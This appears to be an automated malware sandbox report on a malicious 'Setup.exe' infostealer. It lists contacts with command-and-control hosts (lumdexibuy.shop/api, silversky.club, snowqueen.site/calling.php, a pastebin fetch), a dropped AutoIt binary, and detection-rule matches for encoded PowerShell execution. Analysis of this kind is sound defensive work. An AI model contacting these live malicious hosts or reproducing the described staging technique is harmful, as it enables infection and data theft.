            Source: global trafficHTTP traffic detected: GET /4b882c8/script HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: silversky.club
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005829BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_005829BA
            Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
            Source: global trafficHTTP traffic detected: GET /4b882c8/script HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: silversky.club
            Source: global trafficDNS traffic detected: DNS query: GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar
            Source: global trafficDNS traffic detected: DNS query: lumdexibuy.shop
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: global trafficDNS traffic detected: DNS query: cdn1.pixel-story.shop
            Source: global trafficDNS traffic detected: DNS query: silversky.club
            Source: global trafficDNS traffic detected: DNS query: masa.r2cloudzugybyi8.shop
            Source: global trafficDNS traffic detected: DNS query: snowqueen.site
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lumdexibuy.shop
            Source: 'Setup.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 'Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: 'Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: 'Setup.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: 'Setup.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: powershell.exe, 0000000E.00000002.2858459966.0000000006DB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsofth
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 'Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: 'Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 'Setup.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 'Setup.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, 'Setup.exe | String found in binary or memory: http://ocsp.digicert.com0
            Source: 'Setup.exe | String found in binary or memory: http://ocsp.digicert.com0A
            Source: 'Setup.exe | String found in binary or memory: http://ocsp.entrust.net02
            Source: 'Setup.exe | String found in binary or memory: http://ocsp.entrust.net03
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Contrast.com, 0000000A.00000000.2061244784.00000000005D9000.00000002.00000001.01000000.00000007.sdmp, Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: 'Setup.exe | String found in binary or memory: http://www.digicert.com/CPS0
            Source: 'Setup.exe | String found in binary or memory: http://www.entrust.net/rpa03
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://..queen.
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBsq
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000011.00000002.2869363357.00000000055BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsofD
            Source: powershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsofDz
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lumdexibuy.shop/(
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2677727697.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2677790488.000000000457C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lumdexibuy.shop/api
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lumdexibuy.shop/e
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lumdexibuy.shop/ms
            Source: powershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://snowqueen.site
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, 5TM3JMZQCYKEYRKL75T8.ps1.10.dr | String found in binary or memory: https://snowqueen.site/calling.php?compName=
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://snowqueen.site/calling.php?compName=user-PC
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: 'Setup.exe | String found in binary or memory: https://www.entrust.net/rpa0
            Source: Set.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.dr | String found in binary or memory: https://www.globalsign.com/repository/06
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49775 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49786 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49809 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49848 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.58.9:443 -> 192.168.2.5:49854 version: TLS 1.2
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00584830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00584632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0059D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            System Summary

            Source: amsi32_980.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00574254: CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00568F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00575778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\'Setup.exe | File created: C:\Windows\AnneBaths
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_0040737E
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406EFE
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004079A2
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0051B020
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005194E0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00519C80
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005323F5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00598400
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00546502
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0054265E
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0051E6F0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053282A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005489BF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00546A74
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00590A3A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00520BE0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053CD51
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0056EDB2
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00578E44
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00590EB7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00546FE6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005333B7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0052D45D
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053F409
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00511663
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0052F628
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005316B4
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0051F6A0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005378C3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053DBA5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00531BA8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00549CE5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0052DD28
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053BFD6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00531FC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0410B350
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0410B340
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\108941\Contrast.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: String function: 004062CF appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: String function: 00521A36 appears 34 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: String function: 00538B30 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: String function: 00530D17 appears 70 times
            Source: 'Setup.exe | Static PE information: invalid certificate
            Source: 'Setup.exe, 00000000.00000002.2026036005.00000000006D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 'Setup.exe
            Source: 'Setup.exe, 00000000.00000003.2024486838.00000000006D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 'Setup.exe
            Source: 'Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: amsi32_980.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/22@7/3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057A6AD GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00568DE9 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00569399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00574148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_004024FB CoCreateInstance
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
